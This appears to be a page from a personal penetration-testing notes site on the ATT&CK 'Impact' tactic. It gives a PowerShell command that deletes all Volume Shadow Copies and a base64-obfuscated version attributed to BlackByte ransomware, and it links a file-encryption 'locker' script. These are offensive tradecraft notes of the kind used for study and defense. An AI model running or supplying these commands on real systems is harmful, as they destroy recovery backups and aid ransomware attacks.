burmat / nathan burchfield
  • security and systems administration
  • security / hacking
    • Domain Enumeration + Exploitation
      • Command and Control
      • Credential Access
      • Defense Evasion
      • Discovery
      • Execution
      • Impact
      • Lateral Movement
      • Persistence
      • Privilege Escalation
    • Tools and Services
      • Adobe Experience Manager (AEM)
      • amass
      • ike-scan
      • jq
      • Shodan
      • smbmap
      • tmux
      • tshark
      • Voice Over IP (VoIP)
    • One-Liners and Dirty Scripts
    • MSFvenom Cheetsheet
    • Web Application Hacking
      • Cross-Site Scripting (XXS)
      • SQL Injection (SQLi)
    • OSCP / PWK - Random Tips and Tricks
  • systems administration
    • Active Directory Administration
    • Exchange Administration
    • System Fixes
    • Helper Commands
    • Log Parsing
    • SQL Server Administration
    • Windows Terminal Themes
Powered by GitBook
On this page
  • Remove Volume Shadow Copies
  • PowerShell Encryption Routine
  1. security / hacking
  2. Domain Enumeration + Exploitation

Impact

The adversary is trying to manipulate, interrupt, or destroy your systems and data. https://attack.mitre.org/tactics/TA0040/

Remove Volume Shadow Copies

Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

The threat actor TTP is associated with BlackByte and executes the above as base64.

powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlA HQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAb wB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A CAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x

PowerShell Encryption Routine

A trivial example of encrypting files recursively with a random interger as the key

https://github.com/burmat/burmatscripts/blob/master/powershell/AES-Locker.ps1

PreviousExecutionNextLateral Movement

Last updated 5 months ago